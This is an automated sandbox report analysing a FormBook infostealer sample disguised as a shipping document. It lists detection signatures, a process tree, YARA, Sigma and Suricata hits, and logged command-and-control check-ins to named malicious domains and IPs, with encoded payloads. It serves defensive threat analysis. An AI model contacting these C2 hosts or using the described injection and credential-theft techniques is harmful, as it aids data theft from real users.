Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DRAFT COPY BL, CI & PL.exe

Overview

General Information

Sample name:DRAFT COPY BL, CI & PL.exe
Analysis ID:1571295
MD5:0fac19920fd79caf5abd90da55b6a5e9
SHA1:804e3083eedc496d77ce7a5537fe9aa36ee68bd1
SHA256:da172efecaad48e51e4fa1907014ed7f7b871bd701d9690c4a5a1f0530e34397
Tags:exeFormbookuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • DRAFT COPY BL, CI & PL.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe" MD5: 0FAC19920FD79CAF5ABD90DA55B6A5E9)
    • svchost.exe (PID: 6276 cmdline: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • oFlOzErifOVgUf.exe (PID: 5592 cmdline: "C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • tzutil.exe (PID: 5764 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)
          • firefox.exe (PID: 5924 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3520159967.0000000002F70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3520891709.0000000001320000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.3521394310.00000000042D0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000001.00000002.2221510574.0000000003B20000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000001.00000002.2221951172.0000000005600000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe", CommandLine: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe", ParentImage: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe, ParentProcessId: 7088, ParentProcessName: DRAFT COPY BL, CI & PL.exe, ProcessCommandLine: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe", ProcessId: 6276, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe", CommandLine: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe", ParentImage: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe, ParentProcessId: 7088, ParentProcessName: DRAFT COPY BL, CI & PL.exe, ProcessCommandLine: "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe", ProcessId: 6276, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T09:11:03.518511+010028554641A Network Trojan was detected192.168.2.449797217.160.0.11380TCP
                2024-12-09T09:11:06.236207+010028554641A Network Trojan was detected192.168.2.449804217.160.0.11380TCP
                2024-12-09T09:11:08.904181+010028554641A Network Trojan was detected192.168.2.449811217.160.0.11380TCP
                2024-12-09T09:11:28.652905+010028554641A Network Trojan was detected192.168.2.449858154.90.58.20980TCP
                2024-12-09T09:11:31.308929+010028554641A Network Trojan was detected192.168.2.449864154.90.58.20980TCP
                2024-12-09T09:11:33.980808+010028554641A Network Trojan was detected192.168.2.449871154.90.58.20980TCP
                2024-12-09T09:11:44.002220+010028554641A Network Trojan was detected192.168.2.44989738.181.21.17880TCP
                2024-12-09T09:11:46.696987+010028554641A Network Trojan was detected192.168.2.44990438.181.21.17880TCP
                2024-12-09T09:11:49.471268+010028554641A Network Trojan was detected192.168.2.44991238.181.21.17880TCP
                2024-12-09T09:12:08.371814+010028554641A Network Trojan was detected192.168.2.44995823.167.152.4180TCP
                2024-12-09T09:12:11.033303+010028554641A Network Trojan was detected192.168.2.44996723.167.152.4180TCP
                2024-12-09T09:12:13.701206+010028554641A Network Trojan was detected192.168.2.44997323.167.152.4180TCP
                2024-12-09T09:12:24.090048+010028554641A Network Trojan was detected192.168.2.449997103.75.185.2280TCP
                2024-12-09T09:12:26.746209+010028554641A Network Trojan was detected192.168.2.450006103.75.185.2280TCP
                2024-12-09T09:12:29.402336+010028554641A Network Trojan was detected192.168.2.450012103.75.185.2280TCP
                2024-12-09T09:12:38.888222+010028554641A Network Trojan was detected192.168.2.450024162.0.213.9480TCP
                2024-12-09T09:12:41.548244+010028554641A Network Trojan was detected192.168.2.450025162.0.213.9480TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.44ynh.top/l9wb/Avira URL Cloud: Label: malware
                Source: http://www.44ynh.top/l9wb/?X25tIdT0=dKoVDaTSZmwFjIfnPMekOmNSbaoqabF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvj9a+jKl6nL3gw5l63A2ReISiUGJmdOx1Ym0=&_PMl3=z6VH1Hp8JHAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: DRAFT COPY BL, CI & PL.exeReversingLabs: Detection: 44%
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3520159967.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3520891709.0000000001320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3521394310.00000000042D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2221510574.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2221951172.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3520903347.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2221199653.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3520852127.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: DRAFT COPY BL, CI & PL.exeJoe Sandbox ML: detected
                Source: DRAFT COPY BL, CI & PL.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: tzutil.pdbGCTL source: svchost.exe, 00000001.00000003.2188962143.0000000003626000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188878550.000000000361B000.00000004.00000020.00020000.00000000.sdmp, oFlOzErifOVgUf.exe, 00000005.00000003.2228659382.000000000116B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oFlOzErifOVgUf.exe, 00000005.00000000.2145067730.000000000006E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1707183628.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1707820889.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2221539136.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2221539136.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2121845670.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2123770823.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521136563.0000000003ACE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2221550559.00000000035C8000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2224087314.000000000377D000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521136563.0000000003930000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1707183628.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1707820889.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2221539136.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2221539136.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2121845670.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2123770823.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000006.00000002.3521136563.0000000003ACE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2221550559.00000000035C8000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2224087314.000000000377D000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521136563.0000000003930000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: oFlOzErifOVgUf.exe, 00000005.00000002.3522703492.00000000047AC000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521520446.0000000003F5C000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3520285479.000000000327D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2517818127.000000003C48C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: oFlOzErifOVgUf.exe, 00000005.00000002.3522703492.00000000047AC000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521520446.0000000003F5C000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3520285479.000000000327D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2517818127.000000003C48C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: tzutil.pdb source: svchost.exe, 00000001.00000003.2188962143.0000000003626000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188878550.000000000361B000.00000004.00000020.00020000.00000000.sdmp, oFlOzErifOVgUf.exe, 00000005.00000003.2228659382.000000000116B000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0099445A
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099C6D1 FindFirstFileW,FindClose,0_2_0099C6D1
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0099C75C
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0099EF95
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0099F0F2
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0099F3F3
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009937EF
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00993B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00993B12
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0099BCBC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F8C8A0 FindFirstFileW,FindNextFileW,FindClose,6_2_02F8C8A0
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 4x nop then pop edi5_2_0132B04F
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 4x nop then xor eax, eax5_2_0132E8A9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then xor eax, eax6_2_02F79EA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then mov ebx, 00000004h6_2_037704CE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49864 -> 154.90.58.209:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49797 -> 217.160.0.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49811 -> 217.160.0.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49904 -> 38.181.21.178:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49897 -> 38.181.21.178:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49912 -> 38.181.21.178:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49804 -> 217.160.0.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49973 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49997 -> 103.75.185.22:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49858 -> 154.90.58.209:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49967 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 103.75.185.22:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49871 -> 154.90.58.209:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49958 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50006 -> 103.75.185.22:80
                Source: Joe Sandbox ViewIP Address: 162.0.213.94 162.0.213.94
                Source: Joe Sandbox ViewIP Address: 217.160.0.113 217.160.0.113
                Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
                Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                Source: Joe Sandbox ViewASN Name: VNBOOKING-AS-VNVietNamBookingcorporationVN VNBOOKING-AS-VNVietNamBookingcorporationVN
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009A22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_009A22EE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/html; charset=UTF-8Date: Mon, 09 Dec 2024 08:11:28 GMTServer: nginxVary: Accept-EncodingContent-Length: 44Connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00 Data Ascii: KLIU(WHO-QHKM.g
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/html; charset=UTF-8Date: Mon, 09 Dec 2024 08:11:31 GMTServer: nginxVary: Accept-EncodingContent-Length: 44Connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00 Data Ascii: KLIU(WHO-QHKM.g
                Source: global trafficHTTP traffic detected: GET /q3v1/?_PMl3=z6VH1Hp8JH&X25tIdT0=fC5DX2ZaB+U22tqbLO3TDxU7YJzfDko0GDmIeZjVqXUIxO0lfLVpCEprOw8FFlXlAKcfYmOgw3KJO3baxmfc0E1tB/T88Ahd3/Is7XNEE2gmn05mRDUrFrs= HTTP/1.1Host: www.supernutra01.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                Source: global trafficHTTP traffic detected: GET /m5si/?X25tIdT0=eqY3hh7t27bJ5LQfUACiIBop+4++C12UJ8jqVv8fYDW4JFKoOjNM9tGFtSdYH3IXt9v4kCCdG8KeR7OcjMcnk3D3+1Po89+p2utRtVEn8mZesTWlz/QNOcc=&_PMl3=z6VH1Hp8JH HTTP/1.1Host: www.prestigerugz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                Source: global trafficHTTP traffic detected: GET /521z/?X25tIdT0=Yx3A360WU89Z0GGJ4sj1ssKBmwUq+j2s/KQE4E7BbN1HAmIot3HipiLJPY42zmsSwDZ5HnrJyLyqyKfyPPN/Ul94K97G9BNerQ7FJbOxJndggPtqh59eHiM=&_PMl3=z6VH1Hp8JH HTTP/1.1Host: www.jijievo.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                Source: global trafficHTTP traffic detected: GET /l9wb/?X25tIdT0=dKoVDaTSZmwFjIfnPMekOmNSbaoqabF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvj9a+jKl6nL3gw5l63A2ReISiUGJmdOx1Ym0=&_PMl3=z6VH1Hp8JH HTTP/1.1Host: www.44ynh.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                Source: global trafficHTTP traffic detected: GET /q34f/?X25tIdT0=dUs1zx3MtgRbplDX2ZUJYQ2PdhhIhHuhj9/PkAdaJlwoIMpaDvWmQ8f5x9wKpmWIn5GTBIDw1kY0kdraeZ9e5WN4Bfp+jFvkFPdElOhqE98bTiQ+FUKDG58=&_PMl3=z6VH1Hp8JH HTTP/1.1Host: www.75178.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                Source: global trafficHTTP traffic detected: GET /syud/?X25tIdT0=gwko4eFZldhJcfMqOkuan3QkmOfQdTdfj6+zOL8mAR+JwCfgYxN4oPNpnnwcuB8vQ1y33dVzUTzhe1i/ZlYVLB7aoFOkRW7okE41Q20TXo8AOTZtTl9M9bg=&_PMl3=z6VH1Hp8JH HTTP/1.1Host: www.taxitayninh365.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                Source: global trafficDNS traffic detected: DNS query: www.supernutra01.online
                Source: global trafficDNS traffic detected: DNS query: www.prestigerugz.info
                Source: global trafficDNS traffic detected: DNS query: www.buckser.info
                Source: global trafficDNS traffic detected: DNS query: www.jijievo.site
                Source: global trafficDNS traffic detected: DNS query: www.44ynh.top
                Source: global trafficDNS traffic detected: DNS query: www.setwayidiomas.online
                Source: global trafficDNS traffic detected: DNS query: www.75178.club
                Source: global trafficDNS traffic detected: DNS query: www.taxitayninh365.site
                Source: global trafficDNS traffic detected: DNS query: www.ontherise.top
                Source: unknownHTTP traffic detected: POST /m5si/ HTTP/1.1Host: www.prestigerugz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 205Origin: http://www.prestigerugz.infoReferer: http://www.prestigerugz.info/m5si/User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0Data Raw: 58 32 35 74 49 64 54 30 3d 54 6f 77 58 69 57 37 79 69 5a 61 49 2b 35 30 62 56 33 69 4b 49 77 73 5a 38 4e 54 4b 4c 6c 79 53 48 37 37 34 5a 4c 45 45 48 6e 4b 39 4a 31 36 50 50 6a 52 53 37 66 57 65 6c 7a 52 6c 48 58 49 54 70 71 37 69 72 6a 57 51 44 71 7a 4c 4e 49 36 61 6e 61 49 73 6c 6b 2f 37 38 7a 2f 50 74 76 54 79 79 63 52 67 70 6b 30 4b 73 55 35 59 38 78 75 36 7a 64 77 77 4c 76 6e 43 6d 34 32 79 63 4f 35 74 76 41 48 76 30 7a 71 66 32 69 33 37 63 75 31 39 48 72 55 43 4b 42 4f 4b 2b 69 61 35 7a 6d 44 67 7a 44 61 2f 43 64 75 4d 77 54 70 51 53 74 73 4d 76 70 62 67 4c 59 75 58 71 45 66 46 47 57 77 46 56 77 3d 3d Data Ascii: 